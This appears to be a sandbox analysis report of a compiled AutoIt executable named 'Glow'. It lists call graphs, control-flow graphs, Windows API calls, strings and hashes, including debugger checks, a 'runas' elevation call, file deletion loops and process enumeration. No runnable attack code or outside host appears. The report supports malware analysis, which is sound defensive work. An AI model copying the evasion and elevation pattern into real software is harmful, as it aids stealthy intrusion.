98913 3b563a EnterCriticalSection 98907->98913 98910 3b5373 __wsopen_s 21 API calls 98908->98910 98912 3b55d1 98910->98912 98911 3b5617 __fread_nolock 98911->98843 98912->98906 98965 3b54ba EnterCriticalSection 98912->98965 98913->98906 98914 3b5647 LeaveCriticalSection 98913->98914 98914->98907 98916->98855 98917->98842 98918->98873 98919->98849 98920->98842 98921->98861 98922->98842 98923->98859 98924->98865 98925->98863 98926->98868 98927->98869 98929 3b5737 __wsopen_s 26 API calls 98928->98929 98932 3b8a3e 98929->98932 98930 3b8a44 98967 3b56a6 21 API calls 2 library calls 98930->98967 98932->98930 98933 3b8a76 98932->98933 98934 3b5737 __wsopen_s 26 API calls 98932->98934 98933->98930 98935 3b5737 __wsopen_s 26 API calls 98933->98935 98937 3b8a6d 98934->98937 98938 3b8a82 CloseHandle 98935->98938 98936 3b8a9c 98939 3b8abe 98936->98939 98968 3af613 20 API calls __dosmaperr 98936->98968 98940 3b5737 __wsopen_s 26 API calls 98937->98940 98938->98930 98941 3b8a8e GetLastError 98938->98941 98939->98873 98940->98933 98941->98930 98943->98876 98944->98880 98945->98878 98948 3c0757 98946->98948 98947 3c0772 98947->98892 98948->98947 98959 3af649 20 API calls _abort 98948->98959 98950 3c0796 98960 3b2b5c 26 API calls _strftime 98950->98960 98952 3c07a1 98952->98892 98953->98890 98954->98886 98955->98898 98956->98893 98957->98897 98958->98902 98959->98950 98960->98952 98961->98907 98966 3b3319 LeaveCriticalSection 98962->98966 98964 3b56a4 98964->98911 98965->98906 98966->98964 98967->98936 98968->98939 98969 381044 98974 382793 98969->98974 98971 38104a 99010 3a0413 29 API calls __onexit 98971->99010 98973 381054 99011 382a38 98974->99011 98978 38280a 98979 38bf73 8 API calls 98978->98979 98980 382814 98979->98980 98981 38bf73 8 API calls 98980->98981 98982 38281e 98981->98982 98983 38bf73 8 API calls 98982->98983 98984 382828 98983->98984 98985 38bf73 8 API calls 98984->98985 98986 382866 98985->98986 98987 38bf73 8 API calls 98986->98987 98988 382932 98987->98988 99021 382dbc 98988->99021 98992 382964 98993 38bf73 8 API calls 98992->98993 98994 38296e 98993->98994 98995 393160 9 API calls 98994->98995 98996 382999 98995->98996 99048 383166 98996->99048 98998 3829b5 98999 3829c5 GetStdHandle 98998->98999 99000 382a1a 98999->99000 99001 3c39e7 98999->99001 99005 382a27 OleInitialize 99000->99005 99001->99000 99002 3c39f0 99001->99002 99003 3a014b 8 API calls 99002->99003 99004 3c39f7 99003->99004 99055 3f0ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99004->99055 99005->98971 99007 3c3a00 99056 3f12eb CreateThread 99007->99056 99009 3c3a0c CloseHandle 99009->99000 99010->98973 99057 382a91 99011->99057 99014 382a91 8 API calls 99015 382a70 99014->99015 99016 38bf73 8 API calls 99015->99016 99017 382a7c 99016->99017 99018 388577 8 API calls 99017->99018 99019 3827c9 99018->99019 99020 38327e 6 API calls 99019->99020 99020->98978 99022 38bf73 8 API calls 99021->99022 99023 382dcc 99022->99023 99024 38bf73 8 API calls 99023->99024 99025 382dd4 99024->99025 99064 3881d6 99025->99064 99028 3881d6 8 API calls 99029 382de4 99028->99029 99030 38bf73 8 API calls 99029->99030 99031 382def 99030->99031 99032 3a014b 8 API calls 99031->99032 99033 38293c 99032->99033 99034 383205 99033->99034 99035 383213 99034->99035 99036 38bf73 8 API calls 99035->99036 99037 38321e 99036->99037 99038 38bf73 8 API calls 99037->99038 99039 383229 99038->99039 99040 38bf73 8 API calls 99039->99040 99041 383234 99040->99041 99042 38bf73 8 API calls 99041->99042 99043 38323f 99042->99043 99044 3881d6 8 API calls 99043->99044 99045 38324a 99044->99045 99046 3a014b 8 API calls 99045->99046 99047 383251 RegisterWindowMessageW 99046->99047 99047->98992 99049 3c3c8f 99048->99049 99050 383176 99048->99050 99067 3f3c4e 8 API calls 99049->99067 99051 3a014b 8 API calls 99050->99051 99054 38317e 99051->99054 99053 3c3c9a 99054->98998 99055->99007 99056->99009 99068 3f12d1 14 API calls 99056->99068 99058 38bf73 8 API calls 99057->99058 99059 382a9c 99058->99059 99060 38bf73 8 API calls 99059->99060 99061 382aa4 99060->99061 99062 38bf73 8 API calls 99061->99062 99063 382a66 99062->99063 99063->99014 99065 38bf73 8 API calls 99064->99065 99066 382ddc 99065->99066 99066->99028 99067->99053 99069 38f5e5 99070 38cab0 207 API calls 99069->99070 99071 38f5f3 99070->99071

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 224 385fc8-386037 call 38bf73 GetVersionExW call 388577 229 3c507d-3c5090 224->229 230 38603d 224->230 231 3c5091-3c5095 229->231 232 38603f-386041 230->232 233 3c5098-3c50a4 231->233 234 3c5097 231->234 235 3c50bc 232->235 236 386047-3860a6 call 38adf4 call 3855dc 232->236 233->231 237 3c50a6-3c50a8 233->237 234->233 240 3c50c3-3c50cf 235->240 249 3860ac-3860ae 236->249 250 3c5224-3c522b 236->250 237->232 239 3c50ae-3c50b5 237->239 239->229 242 3c50b7 239->242 243 38611c-386136 GetCurrentProcess IsWow64Process 240->243 242->235 245 386138 243->245 246 386195-38619b 243->246 248 38613e-38614a 245->248 246->248 255 3c5269-3c526d GetSystemInfo 248->255 256 386150-38615f LoadLibraryA 248->256 251 3c5125-3c5138 249->251 252 3860b4-3860b7 249->252 253 3c522d 250->253 254 3c524b-3c524e 250->254 258 3c513a-3c5143 251->258 259 3c5161-3c5163 251->259 252->243 260 3860b9-3860f5 252->260 257 3c5233 253->257 261 3c5239-3c5241 254->261 262 3c5250-3c525f 254->262 263 38619d-3861a7 GetSystemInfo 256->263 264 386161-38616f GetProcAddress 256->264 257->261 266 3c5145-3c514b 258->266 267 3c5150-3c515c 258->267 269 3c5198-3c519b 259->269 270 3c5165-3c517a 259->270 260->243 268 3860f7-3860fa 260->268 261->254 262->257 271 3c5261-3c5267 262->271 265 386177-386179 263->265 264->263 272 386171-386175 GetNativeSystemInfo 264->272 279 38617b-38617c FreeLibrary 265->279 280 386182-386194 265->280 266->243 267->243 273 3c50d4-3c50e4 268->273 274 386100-38610a 268->274 277 3c519d-3c51b8 269->277 278 3c51d6-3c51d9 269->278 275 3c517c-3c5182 270->275 276 3c5187-3c5193 270->276 271->261 272->265 284 3c50e6-3c50f2 273->284 285 3c50f7-3c5101 273->285 274->240 281 386110-386116 274->281 275->243 276->243 282 3c51ba-3c51c0 277->282 283 3c51c5-3c51d1 277->283 278->243 286 3c51df-3c5206 278->286 279->280 281->243 282->243 283->243 284->243 287 3c5114-3c5120 285->287 288 3c5103-3c510f 285->288 289 3c5208-3c520e 286->289 290 3c5213-3c521f 286->290 287->243 288->243 289->243 290->243
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00385FF7
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,0041DC2C,00000000,?,?), ref: 00386123
                                                                                                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 0038612A
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00386155
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00386167
                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00386175
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0038617C
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 003861A1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                          • Opcode ID: 6da6f49b1a663a08929f7a99a1ae840a1417fe533aad7520324f351d8eb629c9
                                                                                                                                                                          • Instruction ID: 84da6a64fd1ee95b25b2dd961f3d5c7dd534a2e932b41421331c9409eb977720
                                                                                                                                                                          • Opcode Fuzzy Hash: 6da6f49b1a663a08929f7a99a1ae840a1417fe533aad7520324f351d8eb629c9
                                                                                                                                                                          • Instruction Fuzzy Hash: BCA1812280A3D4DFC712DB787E466953F946B27342B0858BFDC41E7223D2AD8948CB2D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00383368,?), ref: 003833BB
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00383368,?), ref: 003833CE
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00452418,00452400,?,?,?,?,?,?,00383368,?), ref: 0038343A
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                            • Part of subcall function 0038425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00383462,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003842A0
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003834BB
                                                                                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 003C3CB0
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00452418,?,?,?,?,?,?,?,00383368,?), ref: 003C3CF1
                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004431F4,00452418,?,?,?,?,?,?,?,00383368), ref: 003C3D7A
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 003C3D81
                                                                                                                                                                            • Part of subcall function 003834D3: GetSysColorBrush.USER32(0000000F), ref: 003834DE
                                                                                                                                                                            • Part of subcall function 003834D3: LoadCursorW.USER32(00000000,00007F00), ref: 003834ED
                                                                                                                                                                            • Part of subcall function 003834D3: LoadIconW.USER32(00000063), ref: 00383503
                                                                                                                                                                            • Part of subcall function 003834D3: LoadIconW.USER32(000000A4), ref: 00383515
                                                                                                                                                                            • Part of subcall function 003834D3: LoadIconW.USER32(000000A2), ref: 00383527
                                                                                                                                                                            • Part of subcall function 003834D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0038353F
                                                                                                                                                                            • Part of subcall function 003834D3: RegisterClassExW.USER32(?), ref: 00383590
                                                                                                                                                                            • Part of subcall function 003835B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003835E1
                                                                                                                                                                            • Part of subcall function 003835B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383602
                                                                                                                                                                            • Part of subcall function 003835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 00383616
                                                                                                                                                                            • Part of subcall function 003835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00383368,?), ref: 0038361F
                                                                                                                                                                            • Part of subcall function 0038396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00383A3C
                                                                                                                                                                          Strings
                                                                                                                                                                          • 0$E, xrefs: 00383495
                                                                                                                                                                          • runas, xrefs: 003C3D75
                                                                                                                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 003C3CAA
                                                                                                                                                                          • AutoIt, xrefs: 003C3CA5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                          • String ID: 0$E$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                          • API String ID: 683915450-3422563918
                                                                                                                                                                          • Opcode ID: a1c8220d22afd38d16155472d78df96cc6360d107dbcee3da9a157c4f85e23e1
                                                                                                                                                                          • Instruction ID: a068ac503298f5a80a344ffad914e72aa52d66be75ae0f2bbfb8dc0b6d0e8c5a
                                                                                                                                                                          • Opcode Fuzzy Hash: a1c8220d22afd38d16155472d78df96cc6360d107dbcee3da9a157c4f85e23e1
                                                                                                                                                                          • Instruction Fuzzy Hash: A8512B701083456AD703FF60DD01EAE7BA89F96B41F00447EF8925B2A3DB748A49C716

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1741 3edc54-3edc9b call 38bf73 * 3 call 385851 call 3eeab0 1752 3edc9d-3edca6 call 386b7c 1741->1752 1753 3edcab-3edcdc call 38568e FindFirstFileW 1741->1753 1752->1753 1757 3edcde-3edce0 1753->1757 1758 3edd4b-3edd52 FindClose 1753->1758 1757->1758 1760 3edce2-3edce7 1757->1760 1759 3edd56-3edd78 call 38bd98 * 3 1758->1759 1762 3edce9-3edd24 call 38bed9 call 387bb5 call 386b7c DeleteFileW 1760->1762 1763 3edd26-3edd38 FindNextFileW 1760->1763 1762->1763 1776 3edd42-3edd49 FindClose 1762->1776 1763->1757 1766 3edd3a-3edd40 1763->1766 1766->1757 1776->1759
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871
                                                                                                                                                                            • Part of subcall function 003EEAB0: GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003EDCCB
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003EDD1B
                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003EDD2C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003EDD43
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003EDD4C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                          • Opcode ID: 8828af3faac5c83beeb917325bb1ad785c1ee22e3e9c89a468d196eabbf2fa1a
                                                                                                                                                                          • Instruction ID: de0f3a3c79a50bb6f18ed5386f8afabf18e26992edd2d9d8d9b8bb0c39541b59
                                                                                                                                                                          • Opcode Fuzzy Hash: 8828af3faac5c83beeb917325bb1ad785c1ee22e3e9c89a468d196eabbf2fa1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 74315E31408395ABC302FF64CC859EFB7E8AE95304F404EADF5E586191EB21DA09CB67
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 003EDDAC
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 003EDDBA
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 003EDDDA
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003EDE87
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                          • Opcode ID: 2a60dad3fb42d6d62c2f1599fbf1e1710e6b55a54961803e22fa938487bc0383
                                                                                                                                                                          • Instruction ID: 7600c4e428f22fc7fb60ffc38f7cb4db2b4eb0fbccd3334220f432de29482bf5
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a60dad3fb42d6d62c2f1599fbf1e1710e6b55a54961803e22fa938487bc0383
                                                                                                                                                                          • Instruction Fuzzy Hash: 77318671108341AFD312EF50CC85AAFBBE8AFD5350F044A6DF5818B1A1DB71D949CB92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 39ac3e-39b063 call 388ec0 call 39bc58 call 38e6a0 7 39b069-39b073 0->7 8 3d8584-3d8591 0->8 11 39b079-39b07e 7->11 12 3d896b-3d8979 7->12 9 3d8596-3d85a5 8->9 10 3d8593 8->10 13 3d85aa 9->13 14 3d85a7 9->14 10->9 17 39b084-39b090 call 39b5b6 11->17 18 3d85b2-3d85b4 11->18 15 3d897e 12->15 16 3d897b 12->16 13->18 14->13 20 3d8985-3d898e 15->20 16->15 24 3d85bd 17->24 25 39b096-39b0a3 call 38c98d 17->25 18->24 22 3d8990 20->22 23 3d8993 20->23 22->23 28 3d899c-3d89eb call 38e6a0 call 39bbbe * 2 23->28 27 3d85c7 24->27 32 39b0ab-39b0b4 25->32 33 3d85cf-3d85d2 27->33 62 39b1e0-39b1f5 28->62 63 3d89f1-3d8a03 call 39b5b6 28->63 37 39b0b8-39b0d6 call 3a4d98 32->37 34 39b158-39b16f 33->34 35 3d85d8-3d8600 call 3a4cd3 call 387ad5 33->35 40 3d8954-3d8957 34->40 41 39b175 34->41 74 3d862d-3d8651 call 387b1a call 38bd98 35->74 75 3d8602-3d8606 35->75 56 39b0d8-39b0e1 37->56 57 39b0e5 37->57 45 3d895d-3d8960 40->45 46 3d8a41-3d8a79 call 38e6a0 call 39bbbe 40->46 47 3d88ff-3d8920 call 38e6a0 41->47 48 39b17b-39b17e 41->48 45->28 53 3d8962-3d8965 45->53 46->62 98 3d8a7f-3d8a91 call 39b5b6 46->98 47->62 79 3d8926-3d8938 call 39b5b6 47->79 54 3d8729-3d8743 call 39bbbe 48->54 55 39b184-39b187 48->55 53->12 53->62 83 3d888f-3d88b5 call 38e6a0 54->83 84 3d8749-3d874c 54->84 64 39b18d-39b190 55->64 65 3d86ca-3d86e0 call 386c03 55->65 56->37 66 39b0e3 56->66 57->27 68 39b0eb-39b0fc 57->68 69 39b1fb-39b20b call 38e6a0 62->69 70 3d8ac9-3d8acf 62->70 103 3d8a2f-3d8a3c call 38c98d 63->103 104 3d8a05-3d8a0d 63->104 77 3d8656-3d8659 64->77 78 39b196-39b1b8 call 38e6a0 64->78 65->62 101 3d86e6-3d86fc call 39b5b6 65->101 66->68 68->12 80 39b102-39b11c 68->80 70->32 86 3d8ad5 70->86 74->77 75->74 88 3d8608-3d862b call 38ad40 75->88 77->12 81 3d865f-3d8674 call 386c03 77->81 78->62 119 39b1ba-39b1cc call 39b5b6 78->119 122 3d893a-3d8943 call 38c98d 79->122 123 3d8945 79->123 80->33 93 39b122-39b154 call 39bbbe call 38e6a0 80->93 81->62 126 3d867a-3d8690 call 39b5b6 81->126 83->62 130 3d88bb-3d88cd call 39b5b6 83->130 96 3d87bf-3d87de call 38e6a0 84->96 97 3d874e-3d8751 84->97 86->12 88->74 88->75 93->34 96->62 148 3d87e4-3d87f6 call 39b5b6 96->148 109 3d8ada-3d8ae8 97->109 110 3d8757-3d8774 call 38e6a0 97->110 144 3d8ab5-3d8abe call 38c98d 98->144 145 3d8a93-3d8a9b 98->145 149 3d870d-3d8716 call 388ec0 101->149 150 3d86fe-3d870b call 388ec0 101->150 140 3d8ac2-3d8ac4 103->140 117 3d8a0f-3d8a13 104->117 118 3d8a1e-3d8a29 call 38b4b1 104->118 133 3d8aed-3d8afd 109->133 134 3d8aea 109->134 110->62 157 3d877a-3d878c call 39b5b6 110->157 117->118 136 3d8a15-3d8a19 117->136 118->103 165 3d8b0b-3d8b19 118->165 166 3d86ba-3d86c3 call 38c98d 119->166 167 39b1d2-39b1de 119->167 127 3d8949-3d894f 122->127 123->127 168 3d869d-3d86ab call 388ec0 126->168 169 3d8692-3d869b call 38c98d 126->169 127->62 172 3d88cf-3d88dc call 38c98d 130->172 173 3d88de 130->173 151 3d8aff 133->151 152 3d8b02-3d8b06 133->152 134->133 153 3d8aa1-3d8aa3 136->153 140->62 144->140 158 3d8a9d 145->158 159 3d8aa8-3d8ab3 call 38b4b1 145->159 148->62 188 3d87fc-3d8805 call 39b5b6 148->188 189 3d8719-3d8724 call 388577 149->189 150->189 151->152 152->69 153->62 192 3d879f 157->192 193 3d878e-3d879d call 38c98d 157->193 158->153 159->144 159->165 178 3d8b1e-3d8b21 165->178 179 3d8b1b 165->179 166->65 167->62 199 3d86ae-3d86b5 168->199 169->199 187 3d88e2-3d88e9 172->187 173->187 178->20 179->178 195 3d88eb-3d88f0 call 38396b 187->195 196 3d88f5 call 383907 187->196 210 3d8818 188->210 211 3d8807-3d8816 call 38c98d 188->211 189->62 201 3d87a3-3d87ae call 3a9334 192->201 193->201 195->62 209 3d88fa 196->209 199->62 201->12 217 3d87b4-3d87ba 201->217 209->62 212 3d881c-3d883f 210->212 211->212 215 3d884d-3d8850 212->215 216 3d8841-3d8848 212->216 219 3d8860-3d8863 215->219 220 3d8852-3d885b 215->220 216->215 217->62 221 3d8865-3d886e 219->221 222 3d8873-3d8876 219->222 220->219 221->222 222->62 223 3d887c-3d888a 222->223 223->62
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4A$@A$PA$`*E$`A$d0b$d10m0$d1b$d1r0,2$d5m0$e#E$i$tA$tA$(E$(E$(E$(E$A$A
                                                                                                                                                                          • API String ID: 0-1820729067
                                                                                                                                                                          • Opcode ID: 9e63c66d6774e3f2f8ddc3654e98476567198a2c4c190aa6cf947baf45a0b89f
                                                                                                                                                                          • Instruction ID: 439ede3577f032cc6cd6fd72c593a08ba38067ed6a6ad178341a101777d77212
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e63c66d6774e3f2f8ddc3654e98476567198a2c4c190aa6cf947baf45a0b89f
                                                                                                                                                                          • Instruction Fuzzy Hash: 106258B16083418FC725DF14D195AAAFBE1FF89304F10896EE4898B352DB71E949CF86

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00383657
                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00383681
                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00383692
                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003836AF
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003836BF
                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 003836D5
                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003836E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                          • String ID: +$0$0+m"8$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                          • API String ID: 2914291525-2796773451
                                                                                                                                                                          • Opcode ID: e09ba042d7ecec513a0d1131a0af20b16a5d75febf5600410f3a761c433410c5
                                                                                                                                                                          • Instruction ID: 56b9e1cb73a4ed291df4c90509e473e048d671d7eb46d3654387216432ac8eb2
                                                                                                                                                                          • Opcode Fuzzy Hash: e09ba042d7ecec513a0d1131a0af20b16a5d75febf5600410f3a761c433410c5
                                                                                                                                                                          • Instruction Fuzzy Hash: BD21C3F5E01318AFDB00DFA4E989BDEBBB4FB09715F10812AF511A62A0D7B585448F98

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
